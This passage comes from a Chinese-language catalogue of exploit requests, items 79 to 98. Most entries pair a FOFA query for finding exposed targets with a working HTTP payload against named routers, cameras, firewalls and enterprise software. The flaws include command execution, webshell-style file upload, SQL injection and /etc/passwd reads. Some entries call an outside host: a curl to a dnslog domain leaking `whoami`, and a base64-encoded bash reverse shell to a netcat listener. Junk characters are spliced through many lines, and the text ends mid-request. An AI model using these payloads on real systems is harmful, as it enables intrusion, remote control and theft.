------YsOxWxSvj1KyZow1PTsh98fdu6l
; _: m5 g& I. V5 jContent-Disposition: form-data; name="target"
- z! K8 J, {+ q3 D5 r0 @& J' a: C* P4 x6 p9 m; z- Z6 X2 t
/Applications/SkillDevelopAndEHS/ ~, }' q, g( {" Z& |
------YsOxWxSvj1KyZow1PTsh98fdu6l--* i) r9 T0 p, |. w: Q
0 {9 R% K% |1 M0 H Y& o1 }. ~
# c) ?, l2 \1 j0 F3 C# ?# ]: L$ v8 s
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
4 w2 x0 ?$ H' ?* Q+ B+ d# eHost: x.x.x.x
) ^1 O+ M! N/ B! {8 ^0 @% l) c, i9 }: z8 q/ O
- R+ @( [9 N& B! m( y' [4 Q; P' i
79. BYTEVALUE 百为流控路由器远程命令执行# z- y5 q. d: s) _) o6 \4 K
FOFA:BYTEVALUE 智能流控路由器9 C' h3 b$ Y, l$ D' e
GET /goform/webRead/open/?path=|id HTTP/1.1
! {" l+ D9 F N( t& D8 h/ xHost:IP
% Q+ j7 F6 F+ V5 }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
0 P) o" F$ f8 W2 ^4 S/ f/ EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 b) l u- i+ @5 zAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. q# d0 U0 z" }$ C) W+ _* v7 z
Accept-Encoding: gzip, deflate
5 k% b4 F- B' s" A: u NConnection: close2 g0 k$ e6 x/ b5 H
Upgrade-Insecure-Requests: 1
5 n$ F/ g" Y5 h) ?' `3 _
7 `& r- z2 Y+ A6 S
2 h3 L$ l6 f# ]) E/ j% k/ f* w& P2 x80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传+ I) f4 p N G1 D3 M- x# }. J
FOFA:app="速达软件-公司产品"4 z9 K2 {4 s2 }& j# a7 b
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
5 {& E6 }7 E1 H* _Host: x.x.x.x* _( z9 x! \1 u, U( g1 ~2 g. }- V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 f2 f5 l, s8 M1 IContent-Length: 27
4 y0 x. c. y! ], H! h& uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ j& D) S6 u" S) u
Accept-Encoding: gzip, deflate. ? j3 V- l; Z" G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" N1 p+ e2 Y) [2 h) N8 eConnection: close
) C! U. B- x7 h6 P; z/ m9 m d0 Z. OContent-Type: application/octet-stream
9 z3 Z' U8 \2 k1 @Upgrade-Insecure-Requests: 19 P, R# u2 Y( F& E. w T, ~
5 L5 J* [3 C% M0 y<% out.print("oessqeonylzaf");%>
7 g5 U* _5 m9 s* J% t3 Q4 h( p$ w
6 x5 e. `8 Z, a* |8 |; V. P
GET /xykqmfxpoas.jsp HTTP/1.1
& u/ ]. O* k1 cHost: x.x.x.x! x8 | ]% s% O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! O, X3 `' {* \. ~
Connection: close
; a4 ~5 r( |$ f* o l2 u; w+ sAccept-Encoding: gzip
2 w* H7 V9 P+ d+ W
- a/ F5 v1 \8 g5 X7 u; G; K6 l* p. P6 P2 t# l" v$ U( O6 U
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露8 |1 k% Y. l! H
FOFA:app="uniview-视频监控"
) m6 c3 S0 s6 T/ tGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
2 E$ P. D4 U/ ~ e3 p8 J- }Host: x.x.x.x7 ^, \, L* O0 P; S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! G/ J- h; |2 m% w* h6 w" lConnection: close8 H/ y. {& {; x7 \+ s; ?9 r3 P
Accept-Encoding: gzip
* l4 y, p4 {) K5 h0 ]2 o, x+ q
! u& m( H$ {9 L8 ]5 V) T
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
9 Y# }$ I% I) m$ n1 @FOFA:app="思福迪-LOGBASE"8 ~ T4 _1 H. G: O' D- N
POST /bhost/test_qrcode_b HTTP/1.1
% M! d7 M. `3 \5 b7 ?) vHost: BaseURL8 V& d3 r" L' V% S- R6 f4 J* }% R
User-Agent: Go-http-client/1.1$ N, d% a9 c9 Z# A
Content-Length: 232 P8 T5 D) G, i# D
Accept-Encoding: gzip+ i/ l6 a' n6 @, h/ P1 [
Connection: close
: z- J5 Z. s! D: O- w+ f, @6 [Content-Type: application/x-www-form-urlencoded- e7 U2 q2 w: H8 q
Referer: BaseURL
- W+ ?/ P) X6 y! S C1 k" p9 p$ R2 {+ [% L
z1=1&z2="|id;"&z3=bhost' b4 S, Z) c* ]9 V
7 @0 C: v- a; M# w2 P
, B3 V8 ?* C- W q0 p; o83. JeecgBoot testConnection 远程命令执行4 E5 K, B3 ^/ i+ W
FOFA:title=="JeecgBoot 企业级低代码平台"2 F& \6 f' @$ r2 O' [
; R% x2 c6 E7 F, y3 a6 G4 \
+ N/ d4 g" M4 Y% s3 G/ U7 Z: PPOST /jmreport/testConnection HTTP/1.19 M4 l: T4 G5 s
Host: x.x.x.x
; u, F/ L9 o( a1 H: SUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0 N% L3 z+ J! }2 f+ v" FConnection: close
& w8 D$ g* A* t* t# Z3 O! jContent-Length: 88813 X0 P) m+ u5 D8 K
Accept-Encoding: gzip) m, a6 |7 m% l4 r( i
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
% |2 }3 R2 \1 l5 }0 OContent-Type: application/json7 y( u1 |1 p; n( p' x# H- e
6 D B5 D3 _3 {/ h& e
PAYLOAD
- Q' b# S* @: _* u/ D) Z+ t
" C0 }9 c: @" Z3 e/ C( N84. Jeecg-Boot JimuReport queryFieldBySql 模板注入# B' Y+ T! Z! _8 T$ Y! \
FOFA:title=="JeecgBoot 企业级低代码平台"
) ^7 b5 s% I( b4 X8 B3 A
l% m- K8 u" d. d2 n& u
2 j% R/ s% J! A
" n1 {/ q) j# H2 s# X0 IPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
0 k2 Y# k& O% m* A6 R+ B5 qHost: 192.168.40.130:8080
3 F; g# e% _( @0 h* C9 G7 HUser-Agent: curl/7.88.1" E* q m0 l y7 H' o
Content-Length: 156
. ?6 d' m) b! S' R5 h& cAccept: */*
) v7 b5 f, Q* j. M- o& H& G6 tConnection: close
0 T E6 i( J; j5 AContent-Type: application/json8 S! S3 g p* Z2 }" q$ j
Accept-Encoding: gzip( Z2 I% [0 v+ X8 g' D
# j! N6 d A- a2 O, V) Z7 a
{
9 u- M: ^, v& r% c0 e "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",9 X' D2 i5 h$ r1 n) ]! l
"type": "0"
[0 h& }7 p+ Z& y% H% c}
6 J& h( f4 H* v; ~! v$ K; h: ]1 `- _
5 n, W f: w$ Z, \' v1 n, S1 p85. SysAid On-premise< 23.3.36远程代码执行
% k7 U# e7 r/ j; R a, D6 JCVE-2023-47246
- R7 z9 M8 p& h5 e( KFOFA:body="sysaid-logo-dark-green.png"
^1 H# ?) X Q& _0 hEXP数据包如下,注入哥斯拉马
7 r6 r+ `7 S2 f, L* ?8 j1 h1 p5 _POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1/ ]4 i q- W: U% p+ y
Host: x.x.x.x
: E0 {/ N, B4 l5 I# K# ^6 l8 @User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 \( _. v$ y' M0 k7 C6 V0 Z! N( o
Content-Type: application/octet-stream& Y( P/ Q# w+ T, W( W
Accept-Encoding: gzip
6 \6 X# I y5 J+ d# K6 W
, u$ d* Q5 n7 f7 W: m" H7 a NPAYLOAD
+ \0 n+ B5 x! f, F1 M. l: P S/ J9 c7 e& @9 W9 u4 t9 I
回显URL:http://x.x.x.x/userfiles/index.jsp ~6 d3 m. ~6 J8 h! [( U$ n: p0 _
/ L' q4 @, g' o& z
86. 日本tosei自助洗衣机RCE
3 k+ \: G+ H6 K: bFOFA:body="tosei_login_check.php"2 {# U6 U2 c% }3 A. \7 A
POST /cgi-bin/network_test.php HTTP/1.1
: a6 i& j( {9 f, GHost: x.x.x.x2 W9 p9 K' o; M# y ~4 y8 \
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
4 }$ V0 u, l$ f' y6 t; oConnection: close( p/ w; H) t5 S5 v, w2 D
Content-Length: 44
7 t+ f. n" ~; j& S( dAccept: */*4 Y( l. y9 g7 e) g
Accept-Encoding: gzip
) R8 L& W7 i( d0 V# ]9 z/ WAccept-Language: en
z# V( }( O! f- v0 G& l# M) m; nContent-Type: application/x-www-form-urlencoded
7 F: j$ X7 E+ ]$ W% T$ p! F* J0 \& K) W+ g. O9 Z% t" A
host=%0acat${IFS}/etc/passwd%0a&command=ping4 f' S: C% L9 m( x
$ _' M" o8 v* H6 f" @7 p5 F% ~5 o. J/ @% T+ b# r/ ~
87. 安恒明御安全网关aaa_local_web_preview文件上传7 U$ t% f7 e% Q8 K2 o8 a7 u# m9 R
FOFA:title="明御安全网关"$ n; s5 @, x- n9 A: i1 C9 l; h
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
8 A+ r- }) d4 Y7 R+ a6 s- ~3 W7 yHost: X.X.X.X
; y( k3 m3 J3 z6 ^2 j: fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 ^- a% j+ t% @ }8 b0 `# Q0 {Connection: close
6 t- v4 d" e, C- `/ |8 U$ IContent-Length: 198
0 e' @0 z0 J, @3 bAccept-Encoding: gzip% ^- l Q% m9 I6 K$ v" J5 q9 R
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
/ p5 o& O- p. C- {1 l( @1 A6 O8 K+ A) j
--qqobiandqgawlxodfiisporjwravxtvd
0 x) u, d3 o& d" x6 XContent-Disposition: form-data; name="123"; filename="9B9Ccd.php", i/ W+ w) {$ |& }$ ~
Content-Type: text/plain
u; c5 F( i* }8 ^# I% K
; `' ^) l8 Z _. `- B4 B$ E2ZqGNnsjzzU2GBBPyd8AIA7QlDq( q+ {7 b1 }9 l
--qqobiandqgawlxodfiisporjwravxtvd--
& J& r$ H# m" h( A
- x5 m3 h, t( j, t
8 c; W( G" @* z& \) _( Y" u0 M/jfhatuwe.php
1 H' z7 ]4 d* v+ m: `7 \/ w
- ?: B0 r1 j0 l88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行' h8 ^7 J2 u& o& `
FOFA:title="明御安全网关"
; B6 v3 n5 C1 c9 g+ O; \+ ]GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1* f, I# z, |0 Y
Host: x.x.x.xx.x.x.x
& [* T% W* B2 v1 G, m0 D9 [) eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 M' c/ ]1 v# ]" v# D, a. b! jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: a9 h! J% W2 d+ e* C! _
Accept-Encoding: gzip, deflate
9 L8 ~7 }; W% J6 OAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' g0 d [( {1 ~. u3 @Connection: close
: L5 A9 W9 W+ g/ ?
# k$ x" V' z) r$ P( r9 ^; g; G0 x$ O; S
/astdfkhl.php* K4 L2 W. [# g3 k u
) }5 K: T& l2 F, s6 d2 \$ c
89. 致远互联FE协作办公平台editflow_manager存在sql注入8 t7 O* O7 w3 Q7 n) s6 E
FOFA:title="FE协作办公平台" || body="li_plugins_download"3 U6 [* c+ |5 u- t
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
% `: w2 A# e$ d9 b7 x5 XHost: x.x.x.x
4 w6 K- ^: h S& x( o7 B/ hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 z5 @: U) z0 m% r% H4 {( C6 G9 ^Connection: close
) Q! C* U3 x1 F* fContent-Length: 411 ]' `& o+ [' M$ W( }
Content-Type: application/x-www-form-urlencoded
' r" i1 R: q) y a! WAccept-Encoding: gzip% c6 j5 W, ?8 U. L
3 a5 G1 E) d3 roption=2&GUID=-1'+union+select+111*222--+! k' E% ?6 R9 X6 }
2 N0 m5 z( K$ A4 O( Q4 r
y0 A% t. `7 y/ H. p90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
2 Y6 ]/ ^$ y3 `) YFOFA:icon_hash="-1830859634"3 X" ~. i1 L8 Q
POST /php/ping.php HTTP/1.1 Y; A0 W: n; g
Host: x.x.x.x: U- A. }, Y5 N2 k+ p, \/ v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
8 u- G+ ?" M" [ u3 G# _Content-Length: 51
5 G7 a* @/ K& k. x7 ]* ~' ]2 GAccept: application/json, text/javascript, */*; q=0.01# i* \$ ?% K# m
Accept-Encoding: gzip, deflate
& P, m, ~: C5 D* TAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: I' t, p4 ~7 v. j. e$ yConnection: close- A8 Y& O; l: a# P2 f
Content-Type: application/x-www-form-urlencoded
9 `! e( b1 M. s8 `- PX-Requested-With: XMLHttpRequest9 C k; _% D4 I7 h
& l# z9 o' ?4 v4 [
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
7 _0 L4 a3 ^- @9 S- K7 s8 d4 R$ N) |2 w$ J; a: ~
3 }" o9 y, B! C" W6 _9 U91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
1 o' r; J. \+ H( PFOFA:title="综合安防管理平台"
8 j, y& n( `0 i" ]; q9 J& k% T6 e, O1 k! ] BGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.13 e" V1 i( j- D6 V& H
Host: your-ip6 F9 ?0 o6 I/ m# {' V3 D9 [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
8 I/ {5 S+ p3 G7 G& RAccept-Encoding: gzip, deflate
# J- L" \9 O1 w* \6 YAccept: */*
$ q8 t% Q7 O! r! t# fConnection: keep-alive3 k9 G& Z; z7 t( X7 Z, S- S9 b5 N
& s+ O7 P t2 ?- E+ [+ r5 S' W6 y3 S- z6 f5 T
/ E: }, m+ W6 w: F92. 海康威视运行管理中心session命令执行
" \, h) Z/ b7 x# gFastjson命令执行
; d+ C$ `" @" xhunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
D$ k! `% p! \2 h5 V' Z: o6 t nPOST /center/api/session HTTP/1.1
4 d2 R! W( l1 ~; ^8 \Host:
0 B* z7 E& c5 g9 F2 \1 UAccept: application/json, text/plain, */*
( y0 K" m# f3 f6 }; A! B" a8 F: _Accept-Encoding: gzip, deflate/ F) C C$ R3 ?+ I7 W; Q
X-Requested-With: XMLHttpRequest; ^/ Z( P, R0 f J$ k/ r' a) O0 m
Content-Type: application/json;charset=UTF-8
2 h7 a- C4 U. ~7 z& ^: d2 dX-Language-Type: zh_CN
9 u% d+ x8 o' V1 r ~Testcmd: echo test
8 m3 ?# \, q* D# O2 u, |* JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.362 ]- R6 s. U) t; `% H1 Z) B, J
Accept-Language: zh-CN,zh;q=0.94 V$ N+ C' F5 q8 @
Content-Length: 57781 L' e& ~ G+ Y
! R( g' l/ K9 P+ M, C5 i3 Y
PAYLOAD- Q8 e9 a: N9 J$ _. ~
4 u% G Y# T2 k6 x) h% n/ M6 }
/ |( |" J7 [9 _9 \8 Z$ L) P
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
/ Q! z- g- ?: x) A1 S8 DFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="8 V# p' Q* B% r, D* a
POST /?g=app_av_import_save HTTP/1.1
" ~$ U; A! f' {5 T" S4 d; B/ S9 @+ zHost: x.x.x.x
4 [, ?1 l: G% C( J: {) @. N PContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx3 G; G3 r! I( g; B! x4 d9 E7 j
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
6 p1 }3 r$ r+ c) p' E. \
( ~3 S2 R" }7 b2 L& f% L------WebKitFormBoundarykcbkgdfx5 g" i- f% x$ |9 Q
Content-Disposition: form-data; name="MAX_FILE_SIZE", q- q* I" u6 k" @
~/ L- p- ^1 H, F% N10000000) K& s1 z; i1 x! A; @5 R
------WebKitFormBoundarykcbkgdfx
* m/ `+ V: m0 Y3 [; r2 ^# A7 mContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
. J. Z F" v! w4 o/ g+ CContent-Type: text/plain
@4 Y/ ~9 x2 z/ \/ G/ I: O. F; o2 x0 \! g2 G
wagletqrkwrddkthtulxsqrphulnknxa
7 M) _% y' y2 F8 p' ~------WebKitFormBoundarykcbkgdfx
7 y5 r0 ?; @0 g( D- U J! {Content-Disposition: form-data; name="submit_post"
' t6 D- c! L D+ X. G% F! Z" R+ J4 }" _" X) Q4 C
obj_app_upfile+ P" M* q" Q2 U, [' u. j' g
------WebKitFormBoundarykcbkgdfx# A, v% h# n) Z* u" i
Content-Disposition: form-data; name="__hash__"
: U+ @/ U! d5 b, c1 C
& r r% V% U# M0 L5 y) V& a9 k! G) y0b9d6b1ab7479ab69d9f71b05e0e9445/ }' G2 O& I: ^4 q D
------WebKitFormBoundarykcbkgdfx--* Z. N- W1 k# Z
3 A2 p( H$ \' c0 \3 c j; ]4 j
. H, @. Y! @% {, @9 o: O% y$ w. ZGET /attachements/xlskxknxa.txt HTTP/1.1
" ]; W& f) d0 |2 j. D) g" _Host: xx.xx.xx.xx4 N% g: X3 x3 i8 d8 e
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 B M; k$ C- Y
8 n' @' d: M* J5 r* e6 B. o& h( z! B1 s- `
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传# o0 D3 d8 {* M4 \' w
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="# F4 j# v# A1 w, k y k' {7 E( R
POST /?g=obj_area_import_save HTTP/1.1
6 K9 o1 D* _0 ~! y# Y' JHost: x.x.x.x
8 m$ Y/ Z6 G) |. _0 B8 ^/ g9 m: \3 sContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt5 x& b* s, v" \3 x5 ~* r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
* A; g, p5 V8 w# J) n4 G6 w5 {( j4 Q9 U+ D/ Z( p* r" q2 k7 P
------WebKitFormBoundarybqvzqvmt
) G0 v4 }0 o% PContent-Disposition: form-data; name="MAX_FILE_SIZE"- W2 D ?) g6 {; y
, j1 R/ x6 l) R/ E" Z0 @# i100000004 K" E0 N% a/ \' R
------WebKitFormBoundarybqvzqvmt
9 ^: P2 w, t7 i- M! kContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"" l) b; v5 K8 \6 k7 G, F4 E
Content-Type: text/plain- B- W5 ]* p& ]# v
+ |/ I" X3 s/ }pxplitttsrjnyoafavcajwkvhxindhmu
L9 Y& `- }0 H; s5 ^9 z e) R------WebKitFormBoundarybqvzqvmt
7 }0 ~, @3 l: e2 lContent-Disposition: form-data; name="submit_post"3 b Q* x) M: y* L$ D1 ^2 A
" e. Q @/ Y+ o- s% a6 Y4 d; o$ q
obj_app_upfile" u' v; g8 t! c3 Z+ a( v: P U* ?6 s
------WebKitFormBoundarybqvzqvmt
0 G( a& I0 R: F6 }$ J' RContent-Disposition: form-data; name="__hash__") s& d- J1 \* x9 T7 j& C
; I- Z, A- l6 H. Z" X4 d0b9d6b1ab7479ab69d9f71b05e0e9445
, b( T% A- k( H, r5 _1 }/ W5 r* c------WebKitFormBoundarybqvzqvmt--+ k! p1 D- B6 r( c) R* P6 _
T/ u: s: P3 g
4 K' T4 o' Q w5 ?4 J* i) n% ^% ^% D) a
GET /attachements/xlskxknxa.txt HTTP/1.1
0 A% T ~9 Q4 G/ qHost: xx.xx.xx.xx
- [# R2 G2 [/ xUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36' A) \) f- c- ^
( ~) u6 a5 W6 l$ g
$ h+ ~# O9 d# R# Q9 I' B* e, G
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
; u) g3 p4 F% Q1 K% \CVE-2023-490707 W' }7 |$ ]- n& _& a1 L- S7 [+ ]
FOFA:app="Apache_OFBiz"& d* u& J- X6 b) D$ b1 O. Q" G
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.12 b5 _# w9 u/ T+ R: T! L
Host: x.x.x.x
' b+ y# B7 t; Z1 a2 V4 _7 PUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
/ p% p8 N. I& @Connection: close; k% E" t! ~0 D
Content-Length: 889
; H2 U D2 U; U: XContent-Type: application/xml e; ^" C, s, v i( Z a" M' S, [3 {
Accept-Encoding: gzip/ z2 N. |' g& M- k( l: L
) q8 t% R) J( }+ P
<?xml version="1.0"?>
! L( H( o. L1 p4 J' l<methodCall>. v2 N/ e$ ^- Q' \; u3 u: L
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
& `' D' H3 N6 }% a3 A" B" K$ e <params>
3 r1 N* b, T. e1 m3 k3 t+ P <param>
. r+ R/ z0 ` U9 }8 U/ p <value>
7 q( J- f$ `9 Y* Q$ a <struct>6 l( S1 j# g |" `4 e
<member>+ a2 p0 q2 P! X/ j! h- h" G6 w
<name>test</name>" k+ B" w/ e/ K$ h) R
<value>6 p# x3 l. i. W0 J1 S& `
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>3 u5 S* f% J. P" F# \3 T6 s$ l
</value>- C4 J O$ s" D A
</member>
6 I g4 q' r0 w) ^ </struct>/ F. c0 z1 `1 M. t' d& x
</value>
$ o* j/ I; R% D. V9 O% ~ </param>
2 Z5 B* g9 Z' h* t+ j* t </params>! G' p1 _6 {* h+ p" H, f: A+ I, v
</methodCall>
( u& r) Z; p. G: @: s: H6 [3 ?4 t! ~& r0 Q1 @. U% s. U8 P
4 q! z4 _9 ^) m6 a2 k) v% m# s
用ysoserial生成payload! Q# h2 D* q/ B% M
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"- R5 w% ~8 a4 K; N- r5 f5 A7 W
( i; c: V4 v- p) j
7 Y/ Q* f' z4 L1 }4 w将生成的payload替换到上面的POC. v' w4 Z) `# {8 {
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
: ]# ^/ j1 {6 F. z# OHost: 192.168.40.130:8443
( h' P. O( S0 ]5 M9 ^: \User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36: _3 s" r" U! e( d9 T& r
Connection: close
/ @4 U3 a% W+ e1 ^ X# E) ^Content-Length: 8890 ] G% f) [) E) C; r) f, e" y
Content-Type: application/xml
4 v& j1 s0 [" X" YAccept-Encoding: gzip
. t/ Y; E' ?- k3 e. O0 w3 B6 B8 u4 n5 p9 v4 m8 s% r4 o2 R
PAYLOAD- _. Y6 H0 |) ?, m
9 }: p1 a: s% u. }9 P* X, h
96. Apache OFBiz 18.12.11 groovy 远程代码执行7 N/ L/ \ ]( j
FOFA:app="Apache_OFBiz"8 B/ g7 I3 X# ]1 W" ~
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
( e. A8 E% b5 J& YHost: localhost:8443
! @: L: O: X/ g* LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
7 L1 J3 J9 I9 f9 s( J6 I( iAccept: */*. @ K8 `$ y. Y6 m2 t3 b
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 q7 w/ z4 ^3 C2 T
Content-Type: application/x-www-form-urlencoded$ z9 M" [$ m1 p* Q! G: M1 O
Content-Length: 55
6 ]- R z; [/ ~
+ f3 J) n( D7 i6 o( FgroovyProgram=throw+new+Exception('id'.execute().text);& f( d \3 }0 Y) [
' ^" ]" k; Q5 z
' C4 B! _( Y1 O9 A
反弹shell4 z' u R1 e: X' `5 [7 |" u* ~
在kali上启动一个监听8 s/ h( {8 G7 f9 |
nc -lvp 7777
. L- n7 j$ j- j. N$ s! G* T! L* U' F6 C! ~" r7 E& A3 }7 y: H; Q$ @
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1( @. x/ \3 g) S' Q2 H
Host: 192.168.40.130:8443" P/ k- W ?. X7 k t( ~, z U$ j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.00 }- @7 V+ X7 F! N% o% ~' ~
Accept: */*
5 ?2 K' n$ P# O: ~5 @9 d- FAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 Y7 \5 G/ o+ n h* i
Content-Type: application/x-www-form-urlencoded
1 K/ _% h+ F, d0 |% \1 I* K9 gContent-Length: 71" J; V r, M, g! [; N Z5 r: M* g, {
F- } ~' M; V9 P- FgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();* D& `$ Y' h2 G$ s; `6 H7 L1 x
3 k' j* N5 }3 H" Q6 ?0 J+ m% v97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
/ S+ ~# r* q7 ?1 c# tFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"5 r, L3 t2 X$ w3 \9 \
GET /passport/login/ HTTP/1.1
( ^/ F; u# {( w2 M! V, F$ l0 P6 cHost: 192.168.40.130:8085
! _: \$ O1 j* b: e- ?User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
( v) \, c5 y7 E, z! cAccept-Encoding: gzip
7 i9 A) B& k8 `6 sConnection: close
& s# @( P4 W# Y' D A. UCookie: rememberMe=PAYLOAD& D9 W, p$ J7 e; X/ Y! V
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"4 L' i$ L4 o- W1 R* l3 O) b) D
/ [8 u; V( P7 v% ]
0 Y+ T/ \5 m- I4 J6 q98. SpiderFlow爬虫平台远程命令执行+ O. u- m7 F7 P. N
CVE-2024-0195
# g1 G ^& c. z9 \/ ?9 R5 ~FOFA:app="SpiderFlow"+ x8 ?# @5 C$ D! y2 O' M
POST /function/save HTTP/1.1* k1 y9 a, u1 }7 ^" d5 K
Host: 192.168.40.130:80880 ^ n% a3 P$ R* r, D% r1 u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.06 V, S" i. U: h/ t
Connection: close
